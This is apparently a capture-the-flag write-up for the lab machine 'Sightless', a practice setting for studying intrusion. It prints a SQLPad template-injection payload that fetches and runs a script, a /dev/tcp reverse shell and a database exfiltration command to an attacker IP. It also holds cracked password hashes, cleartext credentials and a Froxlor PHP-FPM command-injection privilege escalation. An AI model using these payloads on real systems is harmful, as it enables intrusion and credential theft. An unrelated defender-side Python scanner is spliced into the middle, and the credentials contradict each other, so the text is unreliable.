Sightless
Recon
└─$ grep sight /etc/hosts
10.129.162.59 sightless.htb
HTTP (80)
In the listed services, one of the links leads to the sqlpad
subdomain. Updated hosts.

SQLPad

SQLPad version is 6.10.0

CVE-2022-0944
https://app.opencve.io/cve/?&vendor=sqlpad&product=sqlpad
https://app.opencve.io/cve/CVE-2022-0944
https://github.com/sqlpad/sqlpad/commit/3f92be386c6cd3e5eba75d85f0700d3ef54daf73
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb

As always, fucking curl doesn't work, but wget
works. Spawn the shell.
Reverse Shell
Rev
/bin/bash -i >& /dev/tcp/10.10.14.43/4444 0>&1
Payload
{{ process.mainModule.require('child_process').exec('wget 10.10.14.43/rev -qO-|bash') }}
root@c184118df0a6:/var/lib/sqlpad# ls -alh
total 208K
drwxr-xr-x 4 root root 4.0K Sep 7 19:41 .
drwxr-xr-x 1 root root 4.0K Mar 12 2022 ..
drwxr-xr-x 2 root root 4.0K Aug 9 11:17 cache
-rw-r--r-- 1 root root 293 Sep 7 19:38 index.html
-rw-r--r-- 1 root root 293 Sep 7 19:38 index.html.1
drwxr-xr-x 2 root root 4.0K Aug 9 11:17 sessions
-rw-r--r-- 1 root root 184K Sep 7 19:41 sqlpad.sqlite
-rw-r--r-- 1 root root 0 Sep 7 19:13 t
SQLPad Database
root@c184118df0a6:/var/lib/sqlpad# cat sqlpad.sqlite | base64 > /dev/tcp/10.10.14.43/4444
---
└─$ listen > sqlpad.sqlite.base64
└─$ cat sqlpad.sqlite.base64 | base64 -d > sqlpad.sqlite

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin (?)
1g 0:00:05:45 DONE (2024-09-08 00:07) 0.002898g/s 57.59p/s 57.59c/s 57.59C/s berna..vangogh
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Michael
root@c184118df0a6:/# wget -qO- 10.10.14.43/lp.sh | sh | tee /tmp/lp.log
...
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/perl
/usr/bin/wget
...
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? .............
...
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
...
Nothing in the home directory, but we can try to crack the password.
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blindside (?)
1g 0:00:00:24 DONE (2024-09-08 00:23) 0.04121g/s 1645p/s 1645c/s 1645C/s toutou..promo2007
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The root hash's password is insaneclownposse.
Creds:
root:insaneclownposse
michael:blindside
SSH
Creds:
michael:insaneclownposse
User.txt
michael@sightless:~$ cat user.txt
7a77327fb60d0f9fb017e7653e96cd48
Privilege Escalation
michael@sightless:~$ curl 10.10.14.43/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
...
john 1178 0.0 0.0 2892 988 ? Ss Sep05 0:00 _ /bin/sh -c sleep 110 && /usr/bin/python3 /home/john/automation/administration.py
john 1559 0.0 0.6 33660 24416 ? S Sep05 1:57 _ /usr/bin/python3 /home/john/automation/administration.py
john 1560 0.3 0.3 33630172 15068 ? Sl Sep05 13:06 _ /home/john/automation/chromedriver --port=36347
john 1571 0.6 2.8 34011320 114288 ? Sl Sep05 21:42 | _ /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.PDL79u data:,
john 1577 0.0 1.4 34112452 56124 ? S Sep05 0:00 | _ /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1573 --enable-crash-reporter
john 1593 0.3 3.2 34363116 128216 ? Sl Sep05 13:24 | | _ /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1573 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
john 1578 0.0 1.4 34112456 56308 ? S Sep05 0:00 | _ /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1573 --enable-crash-reporter
john 1623 2.9 5.9 1186800240 234540 ? Rl Sep05 101:39 | | _ /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1573 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1725533755882910 --launc
john 1595 0.1 2.1 33900068 87048 ? Sl Sep05 4:51 | _ /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1573 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,8587652901750450691,3965728681123045342,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
root 1149 0.0 1.1 1874776 47408 ? Ssl Sep05 1:28 /usr/bin/containerd
...
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Sep 3 11:55 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Sep 3 11:55 /etc/apache2/sites-enabled
-rw-r--r-- 1 root root 770 Sep 3 11:55 /etc/apache2/sites-enabled/10_froxlor_ipandport_192.168.1.118.80.conf
<VirtualHost 192.168.1.118:80>
DocumentRoot "/var/www/html/froxlor"
ServerName admin.sightless.htb
<Directory "/lib/">
<Files "userdata.inc.php">
Require all denied
</Files>
</Directory>
<DirectoryMatch "^/(bin|cache|logs|tests|vendor)/">
Require all denied
</DirectoryMatch>
<FilesMatch \.(php)$>
<If "-f %{SCRIPT_FILENAME}">
SetHandler proxy:unix:/var/lib/apache2/fastcgi/1-froxlor.panel-admin.sightless.htb-php-fpm.socket|fcgi://localhost
</If>
</FilesMatch>
<Directory "/var/www/html/froxlor/">
CGIPassAuth On
</Directory>
</VirtualHost>
-rw-r--r-- 1 root root 917 Sep 3 11:55 /etc/apache2/sites-enabled/34_froxlor_normal_vhost_web1.sightless.htb.conf
<VirtualHost 192.168.1.118:80>
ServerName web1.sightless.htb
ServerAlias *.web1.sightless.htb
ServerAdmin john@sightless.htb
DocumentRoot "/var/customers/webs/web1"
<Directory "/var/customers/webs/web1/">
<FilesMatch \.(php)$>
<If "-f %{SCRIPT_FILENAME}">
SetHandler proxy:unix:/var/lib/apache2/fastcgi/1-web1-web1.sightless.htb-php-fpm.socket|fcgi://localhost
</If>
</FilesMatch>
CGIPassAuth On
Require all granted
AllowOverride All
</Directory>
Alias /goaccess "/var/customers/webs/web1/goaccess"
LogLevel warn
ErrorLog "/var/customers/logs/web1-error.log"
CustomLog "/var/customers/logs/web1-access.log" combined
</VirtualHost>
-rw-r--r-- 1 root root 1480 Aug 2 09:05 /etc/apache2/sites-enabled/002-sqlpad.conf
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName sqlpad.sightless.htb
ServerAlias sqlpad.sightless.htb
ProxyPreserveHost On
ProxyPass / http://127.0.0.1:3000/
ProxyPassReverse / http://127.0.0.1:3000/
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 264 Sep 3 11:55 /etc/apache2/sites-enabled/05_froxlor_dirfix_nofcgid.conf
<Directory "/var/customers/webs/">
Require all granted
AllowOverride All
</Directory>
lrwxrwxrwx 1 root root 35 May 15 04:27 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost 127.0.0.1:8080>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/froxlor
ServerName admin.sightless.htb
ServerAlias admin.sightless.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 412 Sep 3 11:55 /etc/apache2/sites-enabled/40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
<Directory "/var/customers/webs/web1/goaccess/">
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /etc/apache2/froxlor-htpasswd/1-666d99c49b2986e75ed93e591b7eb6c8.htpasswd
require valid-user
</Directory>
drwxr-xr-x 2 root root 4096 Aug 9 11:17 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Aug 9 11:17 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 May 21 18:06 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
listen *:80;
server_name sightless.htb;
location / {
root /var/www/sightless;
index index.html;
}
if ($host != sightless.htb) {
rewrite ^ http://sightless.htb/;
}
}
-rw-r--r-- 1 root root 249 Aug 9 07:18 /etc/nginx/sites-enabled/main
server {
listen 80;
server_name sqlpad.sightless.htb;
location / {
proxy_pass http://localhost:3000;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
-rw-r--r-- 1 root root 1414 Aug 9 07:04 /etc/apache2/sites-available/000-default.conf
<VirtualHost 127.0.0.1:8080>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/froxlor
ServerName admin.sightless.htb
ServerAlias admin.sightless.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
...
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5922 May 15 04:24 /etc/vsftpd.conf
anonymous_enable=YES
local_enable
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
anon_root=/var/ftp/
...
Froxlor

Adding the admin subdomain to hosts just redirects to the main domain (the nginx default site rewrites any other Host to sightless.htb, and the admin vhost only listens on 127.0.0.1:8080). Start an SSH session with port forwarding, and point localhost at the admin subdomain in the local hosts file, otherwise it fails.
└─$ ssh michael@sightless.htb -L 8000:0:8080
└─$ head -1 /etc/hosts
127.0.0.1 localhost admin.sightless.htb

michael@sightless:~$ curl 10.10.14.43/pspy64 -so /tmp/pspy
michael@sightless:~$ chmod u+x /tmp/pspy
michael@sightless:~$ /tmp/pspy
...
2024/09/07 20:48:20 CMD: UID=0 PID=2 |
2024/09/07 20:48:20 CMD: UID=0 PID=1 | /sbin/init
2024/09/07 20:48:27 CMD: UID=1001 PID=111831 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:48:27 CMD: UID=1001 PID=111832 | sleep 60
2024/09/07 20:49:27 CMD: UID=1001 PID=111845 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:49:27 CMD: UID=1001 PID=111846 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:50:01 CMD: UID=0 PID=111860 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0 PID=111859 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0 PID=111862 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0 PID=111863 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0 PID=111864 | /bin/sh -c /usr/bin/nice -n 5 /usr/bin/php -q /var/www/html/froxlor/bin/froxlor-cli froxlor:cron 'tasks' -q 1> /dev/null
2024/09/07 20:50:01 CMD: UID=0 PID=111865 | /bin/sh -c /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0 PID=111866 | bash /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0 PID=111867 | bash /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0 PID=111868 |
2024/09/07 20:50:01 CMD: UID=0 PID=111869 | sh -c stty -a | grep columns
2024/09/07 20:50:01 CMD: UID=0 PID=111870 | grep columns
2024/09/07 20:50:01 CMD: UID=0 PID=111871 |
2024/09/07 20:50:01 CMD: UID=0 PID=111873 | grep columns
2024/09/07 20:50:01 CMD: UID=0 PID=111872 |
2024/09/07 20:50:01 CMD: UID=0 PID=111874 | sh -c chown -R froxlorlocal:froxlorlocal '/var/www/html/froxlor/'
2024/09/07 20:50:01 CMD: UID=0 PID=111875 | sh -c chown -R froxlorlocal:froxlorlocal '/var/www/html/froxlor/'
2024/09/07 20:50:10 CMD: UID=0 PID=111876 |
2024/09/07 20:50:27 CMD: UID=1001 PID=111882 | pgrep -f /opt/google/chrome/chrome
2024/09/07 20:50:27 CMD: UID=1001 PID=111883 | sleep 60
2024/09/07 20:51:27 CMD: UID=1001 PID=111901 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:51:27 CMD: UID=1001 PID=111902 |
...
The Chrome remote debugger (DevTools port) is a known weak point when it is reachable.
john 1560 0.3 0.3 33630172 15164 ? Sl Sep05 13:12 /home/john/automation/chromedriver --port=36347
Port forward both ports.
└─$ ssh michael@sightless.htb -L 8000:0:8080 -L 36347:0:36347
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/
Visit chrome://inspect/#devices
ps showed port 36347 in use, but chrome://inspect didn't discover anything: 36347 is chromedriver's own port, and chrome itself was started with --remote-debugging-port=0, so its DevTools port is ephemeral. Port forward all the high ports.
└─$ ssh michael@sightless.htb -L 8000:0:8080 -L 36347:0:36347 -L 34233:0:34233 -L 33101:0:33101 -L 33060:0:33060
localhost:34233 worked.

The automated process logs in every 5 seconds or so, so in the DevTools Network tab we can watch the traffic and grab the username/password.
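As an added defender-side check, not code from the writeup: the script below parses `ps aux` lines in the shape of the listing above and flags chromedriver endpoints, Chrome DevTools remote-debugging ports (including the ephemeral case, --remote-debugging-port=0, which is why the port had to be found by trial here) and browsers started with --no-sandbox. The sample lines are constructed.

```python
import re

# Constructed sample in `ps aux` layout (modelled on the chromedriver and
# chrome lines quoted above, not the writeup's own capture). The "| _" tree
# characters printed by LinPEAS / ps --forest are kept on purpose.
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
john 1560 0.3 0.3 33630172 15068 ? Sl Sep05 13:06 _ /home/john/automation/chromedriver --port=36347
john 1571 0.6 2.8 34011320 114288 ? Sl Sep05 21:42 | _ /opt/google/chrome/chrome --headless --no-sandbox --enable-automation --remote-debugging-port=0 --test-type=webdriver data:,
john 1623 2.9 5.9 1186800240 234540 ? Rl Sep05 101:39 | | _ /opt/google/chrome/chrome --type=renderer --headless --no-sandbox --remote-debugging-port=0
alice 2200 0.1 1.0 30000000 40000 ? Sl Sep05 0:10 /opt/google/chrome/chrome --headless --remote-debugging-port=9222
root 1149 0.0 1.1 1874776 47408 ? Ssl Sep05 1:28 /usr/bin/containerd
"""

TREE_PREFIX = re.compile(r"^[\s|\\_]+")  # strips "| _ " / "\_ " forest prefixes

def parse_ps(text):
    """Return (user, pid, command) tuples from `ps aux` output; skips the header."""
    rows = []
    for line in text.splitlines():
        fields = line.split(None, 10)  # COMMAND is everything after the 10th column
        if len(fields) < 11 or not fields[1].isdigit():
            continue
        rows.append((fields[0], int(fields[1]), TREE_PREFIX.sub("", fields[10])))
    return rows

def flag_debug_endpoints(text):
    """Flag processes exposing a WebDriver or DevTools control endpoint; Chrome
    child processes (--type=...) inherit the browser's flags and are skipped."""
    findings = []
    for user, pid, cmd in parse_ps(text):
        argv = cmd.split()
        if any(a.startswith("--type=") for a in argv):
            continue
        exe = argv[0].rsplit("/", 1)[-1]
        if exe == "chromedriver":
            m = re.search(r"--port=(\d+)", cmd)
            port = m.group(1) if m else "default"
            findings.append((user, pid, f"chromedriver WebDriver endpoint on port {port}"))
        elif exe == "chrome":
            m = re.search(r"--remote-debugging-port=(\d+)", cmd)
            if m:
                port = int(m.group(1))
                where = "an ephemeral port (resolve with ss -ltnp)" if port == 0 else f"port {port}"
                findings.append((user, pid, f"DevTools remote debugging on {where}"))
            if "--no-sandbox" in argv:
                findings.append((user, pid, "chrome sandbox disabled"))
    return findings

if __name__ == "__main__":
    for user, pid, issue in flag_debug_endpoints(SAMPLE_PS):
        print(f"{user:<8}{pid:<8}{issue}")
```

On a live host, feed it `ps aux` output and pair any ephemeral-port finding with `ss -ltnp` to see which loopback port the browser actually bound.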

Creds:
admin:ForlorfroxAdmin
Admin Panel

I have been browsing for some time, and it seems like from admin I went to web1.

Traffic > Customers > Table > web1 --> We become web1
As web1, we can change the FTP password without knowing the previous one.

FTP
The ftp command fails because of SSL; use lftp.
└─$ lftp web1@sightless.htb
lftp web1@sightless.htb:~> ls
ls: Fatal error: Certificate verification: The certificate is NOT trusted. The certificate issuer is unknown. (A1:4B:95:93:0A:CF:15:CD:DD:52:68:ED:DB:5B:92:ED:F0:F3:3C:69)
lftp web1@sightless.htb:~> set ssl:verify-certificate no
lftp web1@sightless.htb:/> ls -alhR
drwxr-x--- 3 web1 web1 4.0k Aug 2 07:02 .
drwxr-x--- 3 web1 web1 4.0k Aug 2 07:02 ..
drwxr-xr-x 3 web1 web1 4.0k May 17 03:17 goaccess
-rw-r--r-- 1 web1 web1 8.2k Mar 29 10:29 index.html
goaccess:
drwxr-xr-x 3 web1 web1 4.0k May 17 03:17 .
drwxr-x--- 3 web1 web1 4.0k Aug 2 07:02 ..
drwxr-xr-x 2 web1 web1 4.0k Aug 2 07:14 backup
goaccess/backup:
drwxr-xr-x 2 web1 web1 4.0k Aug 2 07:14 .
drwxr-xr-x 3 web1 web1 4.0k May 17 03:17 ..
-rw-r--r-- 1 web1 web1 5.2k Aug 6 14:29 Database.kdb
lftp web1@sightless.htb:/> get goaccess/backup/Database.kdb
KeePass
└─$ file Database.kdb
Database.kdb: Keepass password database 1.x KDB, 8 groups, 4 entries, 600000 key transformation rounds
└─$ keepass2john Database.kdb > Database.hash
Inlining Database.kdb
└─$ cat Database.hash | clip
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
Use the "--format=KeePass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs (Database.kdb)
1g 0:00:01:53 DONE (2024-09-08 02:10) 0.008845g/s 9.341p/s 9.341c/s 9.341C/s kucing..stars
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Root
Creds:
root:q6gnLTB74L132TMdFCpK
ssh didn't like the downloaded key and kept giving crypto errors (the key had Windows line endings). Solution: https://unix.stackexchange.com/a/734936
└─$ chmod 600 id_rsa
└─$ dos2unix id_rsa
dos2unix: converting file id_rsa to Unix format...
└─$ ssh root@10.129.162.59 -i id_rsa
Last login: Tue Sep 3 08:18:45 2024
root@sightless:~# id
uid=0(root) gid=0(root) groups=0(root)
Root.txt
root@sightless:~# cat root.txt
c231fb47d333b24c759af588af96dc18
Unintended steps (?)
That is the LFI code; you have to use suppress_origin=True
in the ws connection, and you can do some LFI:
https://gist.github.com/pich4ya/5e7d3d172bb4c03360112fd270045e05
and
Go to PHP > PHP-FPM versions and create a new PHP-FPM version.
In the PHP-FPM restart command field, enter:
chmod 4000 /bin/bash
Save the changes.
Go to http://127.0.0.1:8080/admin_settings.php?start=phpfpm, disable PHP-FPM, and save. Then, re-enable PHP-FPM and save. This will execute the chmod command.
After this, from Michael’s account, execute:
/bin/bash -p
This will give you a bash shell with root privileges.
If it doesn’t work immediately, repeat the process until it takes effect.
# Note: from the chatter, this may take up to 4-5 minutes (?)
and
sarperavci > Disclosing Froxlor V2.x Authenticated RCE as Root Vulnerability via PHP-FPM ??